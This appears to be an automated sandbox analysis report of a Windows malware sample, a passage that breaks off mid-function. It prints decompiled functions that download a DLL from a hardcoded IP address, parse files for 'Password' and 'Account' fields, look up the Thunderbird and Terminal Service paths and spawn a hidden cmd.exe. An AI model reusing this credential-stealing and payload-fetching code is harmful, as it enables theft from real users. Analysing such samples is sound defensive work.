				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E0040EAAE( &_v8, _t96, E004033AB( &_v16, L"ImagePath"),  &_v36);
					E004058FB(_v16);
					E0040EA99( &_v8);
					_t103 = _t50;
					if(_t50 != 0) {
						E00402CA1( &_v36, _t103,  &_v12);
						E00402D8C( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E0040EAAE( &_v8, _t96, E004033AB( &_v16, L"ServiceDll"),  &_v36);
								E004058FB(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E004031FD(_t72 + 0x20, E00402F9A( &_v16, E00402CA1( &_v36, _t107,  &_v28), _t107));
									E004058FB(_v16);
									_v16 = _v16 & 0x00000000;
									E004058FB(_v28);
								}
								E0040EA99( &_v8);
							}
						}
						E004058FB(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00402DFF( &_v36);
				E004058FB(_v20);
				E004058FB(_v24);
				return E0040EA99( &_v8);
			}

0x0040bdf7
0x0040bdff
0x0040be0b
0x0040be0e
0x0040be1b
0x0040be23
0x0040be30
0x0040be40
0x0040be5b
0x0040be65
0x0040be6d
0x0040be72
0x0040be74
0x0040be81
0x0040be89
0x0040bea0
0x0040becf
0x0040bee6
0x0040bef0
0x0040bef5
0x0040bef7
0x0040bf13
0x0040bf1b
0x0040bf23
0x0040bf27
0x0040bf27
0x0040bf2f
0x0040bf2f
0x0040becf
0x0040bf37
0x0040bf3c
0x0040bf3c
0x0040be74
0x0040bf43
0x0040bf4b
0x0040bf53
0x0040bf63

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

RegOpenKeyExW.ADVAPI32 ref: 0040BE38

Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

StrStrW.SHLWAPI(?,svchost.exe), ref: 0040BE9C
StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040BEAA
RegOpenKeyExW.ADVAPI32 ref: 0040BEC7

Strings

ImagePath, xrefs: 0040BE4A
svchost.exe -k, xrefs: 0040BEA2
svchost.exe, xrefs: 0040BE94
ServiceDll, xrefs: 0040BED5
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BE13
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040BE03

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
API String ID: 2246401353-3333427388
Opcode ID: de1d24e80b811010541691654104bd08d4f21dff33e2f7b71c4b14df932f3dd7
Instruction ID: 64bba380daa3bfec47375a8439a74281b059c2058821268f4613e4dc92f8855d
Opcode Fuzzy Hash: de1d24e80b811010541691654104bd08d4f21dff33e2f7b71c4b14df932f3dd7
Instruction Fuzzy Hash: 0E412C71D10219ABCB14EBA2CD92AEEBB78EF08705F10407EA911B21D1DF785F14DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F445 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F445(WCHAR* __ecx, intOrPtr* __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr* _v28;
				void* _t24;
				intOrPtr _t29;
				long _t46;
				void* _t51;
				void* _t55;

				_t46 = 0;
				_v28 = __edx;
				_t24 = InternetOpenW(L"Mozilla/32.0 (compatible)", 0, 0, 0, 0);
				_v24 = _t24;
				if(_t24 == 0) {
					L7:
					return 0;
				}
				_t51 = InternetOpenUrlW(_t24, __ecx, 0, 0, 0x400000, 0);
				if(_t51 == 0) {
					goto L7;
				}
				_v8 = 0;
				InternetQueryDataAvailable(_t51,  &_v8, 0, 0);
				_v12 = _v12 | 0xffffffff;
				_t29 = E0040590A(0x400000);
				_v20 = _t29;
				if(_t29 == 0) {
					goto L7;
				}
				_v16 = 0;
				do {
					_t53 = E004010AD(_v8);
					InternetReadFile(_t51, _t31, _v8,  &_v12);
					_v16 = _v16 + _v8;
					InternetQueryDataAvailable(_t51,  &_v8, 0, 0);
					E0040102C(_v20 + _t46, _t31, _v12);
					_t46 = _t46 + _v12;
					E004010C1(_t53);
					_t55 = _t55 + 0x10;
				} while (_v12 != 0);
				InternetCloseHandle(_v24);
				InternetCloseHandle(_t51);
				if(_t46 != _v16) {
					goto L7;
				}
				 *_v28 = _t46;
				return _v20;
			}

0x0040f44e
0x0040f450
0x0040f45e
0x0040f464
0x0040f469
0x0040f523
0x00000000
0x0040f523
0x0040f47f
0x0040f483
0x00000000
0x00000000
0x0040f48e
0x0040f493
0x0040f499
0x0040f4a2
0x0040f4a7
0x0040f4ac
0x00000000
0x00000000
0x0040f4b0
0x0040f4b3
0x0040f4bc
0x0040f4c7
0x0040f4d5
0x0040f4df
0x0040f4ef
0x0040f4f4
0x0040f4f8
0x0040f4fd
0x0040f500
0x0040f50f
0x0040f512
0x0040f517
0x00000000
0x00000000
0x0040f51c
0x00000000

APIs

InternetOpenW.WININET(Mozilla/32.0 (compatible),00000000,00000000,00000000,00000000), ref: 0040F45E
InternetOpenUrlW.WININET(00000000,http://5.206.225.104/dll/softokn3.dll,00000000,00000000,00400000,00000000), ref: 0040F479
InternetQueryDataAvailable.WININET(00000000,0040A612,00000000,00000000), ref: 0040F493

Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914

Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA

InternetReadFile.WININET(00000000,00000000,0040A612,000000FF), ref: 0040F4C7
InternetQueryDataAvailable.WININET(00000000,0040A612,00000000,00000000), ref: 0040F4DF

Part of subcall function 004010C1: GetProcessHeap.KERNEL32(00000000,00000000,004032DA,00000000,00000000,?,?,?,00000000), ref: 004010C7
Part of subcall function 004010C1: HeapFree.KERNEL32(00000000,?,?), ref: 004010CE

InternetCloseHandle.WININET(?), ref: 0040F50F
InternetCloseHandle.WININET(00000000), ref: 0040F512

Strings

Mozilla/32.0 (compatible), xrefs: 0040F457
http://5.206.225.104/dll/softokn3.dll, xrefs: 0040F477

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Internet$Heap$AvailableCloseDataHandleOpenProcessQuery$AllocAllocateFileFreeReadVirtual
String ID: Mozilla/32.0 (compatible)$http://5.206.225.104/dll/softokn3.dll
API String ID: 2004831061-3309120073
Opcode ID: fd5ac9df68bc0625120179cc32dd15bd6d2af95af2f17a3ee6a15d7d619fd10e
Instruction ID: 0bee95642922ad016ee5d3fa3ca101ef3702029e2abbe1c262094c5c5630f16c
Opcode Fuzzy Hash: fd5ac9df68bc0625120179cc32dd15bd6d2af95af2f17a3ee6a15d7d619fd10e
Instruction Fuzzy Hash: 23212AB5D00209BFDB119FA5DD85ABFBBBCEB45354F1041B6F400F2291D6789E508BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408606 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 226
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408606(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t101;
				char _t103;
				void* _t124;
				intOrPtr _t126;
				char _t127;
				long _t132;
				void* _t134;
				void* _t141;
				void* _t145;
				void* _t146;
				intOrPtr* _t163;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				intOrPtr _t171;
				intOrPtr* _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr* _t176;
				CHAR* _t177;
				void* _t178;
				void* _t179;

				_v36 = __ecx;
				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t173 != 0xffffffff) {
					_t132 = GetFileSize(_t173, 0);
					_v16 = _t132;
					_t170 = E004059A9(_t132);
					_v32 = _t170;
					E00401052(_t170, 0, _t132);
					_v24 = _v24 & 0x00000000;
					_t179 = _t178 + 0xc;
					ReadFile(_t173, _t170, _t132,  &_v24, 0);
					CloseHandle(_t173);
					_t174 = E0040590A(0x400000);
					_v28 = _t174;
					_a4 = E0040590A(0x104);
					_t96 = E0040590A(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t134 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E004058FB(_a4);
						E004058FB(_v12);
						return E004058FB(_t174);
					} else {
						goto L3;
					}
					do {
						L3:
						_t165 =  *((intOrPtr*)(_t134 + _t170));
						_t13 = _t165 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t165 - 0x3d;
						if(_t165 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t174)) = _t165;
						_t141 = _t141 + 1;
						__eflags = _t165;
						if(_t165 != 0) {
							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
								__eflags =  *_t170 - 0xd0;
								_t101 = 2;
								_t145 = 9;
								_t102 =  !=  ? _t145 : _t101;
								_t146 = ( !=  ? _t145 : _t101) + _t134;
								_t103 =  *((intOrPtr*)(_t146 + _t170));
								_t166 = 0;
								__eflags = _t103 - 0x20;
								if(_t103 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									_v52 = 0;
									_v48 = 0;
									 *((char*)(_t166 +  *_t60)) = 0;
									_v44 = 0;
									E00403185( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E00403185( &_v16,  *_t66);
									E004031FD( &_v44, E00402E63( &_v20, __eflags,  &_v32));
									E004058FB(_v32);
									E004031FD( &_v48, E00402E63( &_v16, __eflags,  &_v32));
									E004058FB(_v32);
									_v40 = 5;
									E004031FD( &_v52, E004033AB( &_v32, 0x412428));
									E004058FB(_v32);
									E00401ED8(_t179 - 0x10,  &_v52);
									E00401F0E(_v36);
									E004058FB(_v16);
									E004058FB(_v20);
									E0040138F( &_v52);
									goto L36;
								}
								_t163 = _t146 + _t170;
								__eflags = _t163;
								_t58 =  &_v12; // 0x50
								_t171 =  *_t58;
								while(1) {
									__eflags = _t103 - 0x7f;
									if(_t103 >= 0x7f) {
										goto L35;
									}
									__eflags = _t103 - 0x21;
									if(_t103 == 0x21) {
										goto L35;
									}
									 *((char*)(_t166 + _t171)) = _t103;
									_t166 = _t166 + 1;
									_t163 = _t163 + 1;
									_t103 =  *_t163;
									__eflags = _t103 - 0x20;
									if(_t103 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t170 - 0xd0;
						_t124 = 2;
						_t167 = 9;
						_t125 =  !=  ? _t167 : _t124;
						_t168 = 0;
						_t126 = ( !=  ? _t167 : _t124) + _t134;
						_v20 = _t126;
						_t127 =  *((intOrPtr*)(_t126 + _t170));
						__eflags = _t127 - 0x20;
						if(_t127 <= 0x20) {
							L19:
							 *((char*)(_t168 + _a4)) = 0;
							goto L28;
						}
						_t176 = _v20 + _t170;
						__eflags = _t176;
						_v20 = _t176;
						_t172 = _t176;
						_t177 = _a4;
						while(1) {
							__eflags = _t127 - 0x7f;
							if(_t127 >= 0x7f) {
								break;
							}
							_t172 = _t172 + 1;
							 *((char*)(_t168 + _t177)) = _t127;
							_t168 = _t168 + 1;
							_t127 =  *_t172;
							__eflags = _t127 - 0x20;
							if(_t127 > 0x20) {
								continue;
							}
							break;
						}
						_t174 = _v28;
						_t170 = _v32;
						goto L19;
						L28:
						_t134 = _t134 + 1;
						__eflags = _t134 - _v16;
					} while (_t134 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t173);
			}

0x00408611
0x00408629
0x0040862e
0x0040864a
0x0040864e
0x00408657
0x0040865c
0x0040865f
0x00408664
0x0040866b
0x00408674
0x0040867b
0x0040868b
0x00408694
0x0040869e
0x004086a1
0x004086a6
0x004086a8
0x004086ad
0x004086af
0x004086b2
0x0040889d
0x004088a0
0x004088a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004086b8
0x004086b8
0x004086b8
0x004086bb
0x004086be
0x004086c0
0x00000000
0x00000000
0x004086c6
0x004086c9
0x00000000
0x00000000
0x004086cf
0x004086d2
0x004086d3
0x004086d5
0x00408774
0x00408779
0x00000000
0x00000000
0x0040877b
0x00408780
0x00000000
0x00000000
0x00408782
0x00408787
0x00000000
0x00000000
0x00408789
0x0040878e
0x00000000
0x00000000
0x00408790
0x00408795
0x00000000
0x00000000
0x00408797
0x0040879c
0x00000000
0x00000000
0x0040879e
0x004087a3
0x00000000
0x00000000
0x004087a5
0x004087aa
0x004087bb
0x004087c0
0x004087c3
0x004087c4
0x004087c7
0x004087cc
0x004087cf
0x004087d1
0x004087d3
0x004087ed
0x004087ed
0x004087f4
0x004087f7
0x004087fa
0x004087fd
0x00408800
0x00408805
0x0040880b
0x00408820
0x00408828
0x0040883d
0x00408845
0x00408852
0x00408862
0x0040886a
0x00408878
0x00408880
0x00408888
0x00408890
0x00408898
0x00000000
0x00408898
0x004087d5
0x004087d5
0x004087d7
0x004087d7
0x004087da
0x004087da
0x004087dc
0x00000000
0x00000000
0x004087de
0x004087e0
0x00000000
0x00000000
0x004087e2
0x004087e5
0x004087e6
0x004087e7
0x004087e9
0x004087eb
0x00000000
0x00000000
0x00000000
0x004087eb
0x00000000
0x004087da
0x00000000
0x004087aa
0x004086db
0x004086de
0x00000000
0x00000000
0x004086e4
0x004086e9
0x00000000
0x00000000
0x004086ef
0x004086f4
0x00000000
0x00000000
0x004086fa
0x004086ff
0x00000000
0x00000000
0x00408705
0x0040870a
0x00000000
0x00000000
0x00408710
0x00408715
0x00000000
0x00000000
0x0040871b
0x00408720
0x00000000
0x00000000
0x00408726
0x0040872b
0x00000000
0x00000000
0x0040872d
0x00408732
0x00408735
0x00408736
0x00408739
0x0040873b
0x0040873d
0x00408740
0x00408743
0x00408745
0x00408769
0x0040876c
0x00000000
0x00408770
0x0040874a
0x0040874a
0x0040874c
0x0040874f
0x00408751
0x00408754
0x00408754
0x00408756
0x00000000
0x00000000
0x00408758
0x00408759
0x0040875c
0x0040875d
0x0040875f
0x00408761
0x00000000
0x00000000
0x00000000
0x00408761
0x00408763
0x00408766
0x00000000
0x004087ac
0x004087ac
0x004087ad
0x004087ad
0x00000000
0x004087b6
0x00408630
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408623
GetLastError.KERNEL32 ref: 00408630
CloseHandle.KERNEL32(00000000), ref: 00408637
GetFileSize.KERNEL32(00000000,00000000), ref: 00408644
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
CloseHandle.KERNEL32(00000000), ref: 0040867B

Strings

Password, xrefs: 004087ED, 004087D7, 004087F3
Password, xrefs: 00408805

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateErrorLastReadSize
String ID: Password$Password
API String ID: 1366138817-7788977
Opcode ID: 3bc884f5ab4bd542d8a62781b9738e0722c350c62e50e95688bf04f0467a17db
Instruction ID: 3b10680125b4717c2d2d0c900cc0c68fdfff5759fd1223d8dacc4a1490584684
Opcode Fuzzy Hash: 3bc884f5ab4bd542d8a62781b9738e0722c350c62e50e95688bf04f0467a17db
Instruction Fuzzy Hash: E5810475D04245AEEB21EB65CD817EEBB65AF85318F20807FE481772C2CA7D0D42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEB6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D105: WSAStartup.WS2_32(00000202,?), ref: 0040D122
Part of subcall function 0040D105: socket.WS2_32(00000002,00000001,00000000), ref: 0040D133
Part of subcall function 0040D105: gethostbyname.WS2_32(?), ref: 0040D141
Part of subcall function 0040D105: htons.WS2_32(?), ref: 0040D167
Part of subcall function 0040D105: connect.WS2_32(00000000,?,00000010), ref: 0040D17A

recv.WS2_32(00000000,?,00000001,00000000), ref: 0040CEF8
recv.WS2_32(00000000,?,00000001,00000000), ref: 0040CF0D
recv.WS2_32(00000000,?,00000002,00000000), ref: 0040CF20
htons.WS2_32(?), ref: 0040CF2E
recv.WS2_32(00000000,?,00000004,00000000), ref: 0040CF44
wsprintfA.USER32 ref: 0040CF93
recv.WS2_32(00000000,?,000000FF,00000000), ref: 0040CFAB

Part of subcall function 0040D01D: send.WS2_32(00000000,?,00000001,00000000), ref: 0040D03C
Part of subcall function 0040D01D: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0040D051
Part of subcall function 0040D01D: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0040D066

Part of subcall function 0040D07E: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0040D09B
Part of subcall function 0040D07E: recv.WS2_32(00000000,?,00000800,00000000), ref: 0040D0CF
Part of subcall function 0040D07E: send.WS2_32(00000000,?,00000000,00000000), ref: 0040D0E8

Strings

%u.%u.%u.%u, xrefs: 0040CF8D

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
String ID: %u.%u.%u.%u
API String ID: 735718650-1542503432
Opcode ID: ddc7814d95f667b02328ed0214a1fe7157955ddb27f9a59f17335d7bf1dd7acf
Instruction ID: 01f61b76f73268f1a0272151d95a6ca4b28235c8cca5bf28ea68f02ea87c1580
Opcode Fuzzy Hash: ddc7814d95f667b02328ed0214a1fe7157955ddb27f9a59f17335d7bf1dd7acf
Instruction Fuzzy Hash: 5241B97160420666D714AAB98C85FBB76CD9FC8348F00053BF994E71D1DA78C90BA7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F628 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F628() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0040F7CD(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E00401052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E0040F6ED(_t24);
						}
					}
				}
				return _t10;
			}

0x0040f637
0x0040f63a
0x0040f641
0x0040f649
0x0040f652
0x0040f6d8
0x0040f6dd
0x0040f6df
0x0040f6e1
0x00000000
0x0040f6e1
0x0040f658
0x0040f66b
0x0040f673
0x0040f68a
0x0040f699
0x0040f6a3
0x0040f6a7
0x0040f6a8
0x0040f6a9
0x0040f6be
0x0040f6c6
0x0040f6cd
0x0040f6d3
0x0040f6e3
0x00000000
0x0040f6e3
0x0040f6c6
0x0040f652
0x0040f6ec

APIs

GetCurrentProcess.KERNEL32(00410BF3,?,?,00000000), ref: 0040F63A
IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0040F641
VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0040F665
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F673
lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0040F681
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040F6BE
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0040F6CD

Strings

\System32\cmd.exe, xrefs: 0040F67B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
String ID: \System32\cmd.exe
API String ID: 3151064845-2003734499
Opcode ID: 2882fced29533786e486acd91281d48045ef682232ba62fb35eeee5957ff54ce
Instruction ID: 511c1d3811cfd2c5a386aa843b6faae71961f3a57ed96b5eac9629c749fce73f
Opcode Fuzzy Hash: 2882fced29533786e486acd91281d48045ef682232ba62fb35eeee5957ff54ce
Instruction Fuzzy Hash: 261196B2A00208BFE72097B59D4AFEF766CDB04749F004436B705F61D0D6B49D058679

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABE2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ABE2(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E00401052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}

0x0040abf6
0x0040ac00
0x0040ac06
0x0040ac08
0x0040ac0a
0x0040ac1e
0x0040ac2c
0x0040ac4d
0x00000000
0x0040ac75
0x0040ac62
0x0040ac6b
0x00000000

APIs

lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
lstrcatW.KERNEL32 ref: 0040AC2C
RegOpenKeyExW.ADVAPI32 ref: 0040AC45
RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040AC18
Path, xrefs: 0040AC5A
thunderbird.exe, xrefs: 0040AC24

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcatlstrcpy
String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
API String ID: 3135247354-1374996286
Opcode ID: 0c3a42d3e5cf8c9301a21b26cd1f184a73bdf1ba72b6752b472d4058f3a7a5c6
Instruction ID: 29902e718fa4eac5a904a8c2cfc6c8b763e92419dbb19266740fd7d90a2d764c
Opcode Fuzzy Hash: 0c3a42d3e5cf8c9301a21b26cd1f184a73bdf1ba72b6752b472d4058f3a7a5c6
Instruction Fuzzy Hash: 4C1121B2A4021DBFEB10EB94DD49FEE7BBCEB14304F104076B609E2190E6B49E54CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE4F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 175
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040FE4F(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x412380, 0, 1, 0x414694,  &_v24);
				_t91 = _v24;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t95 = _v24;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
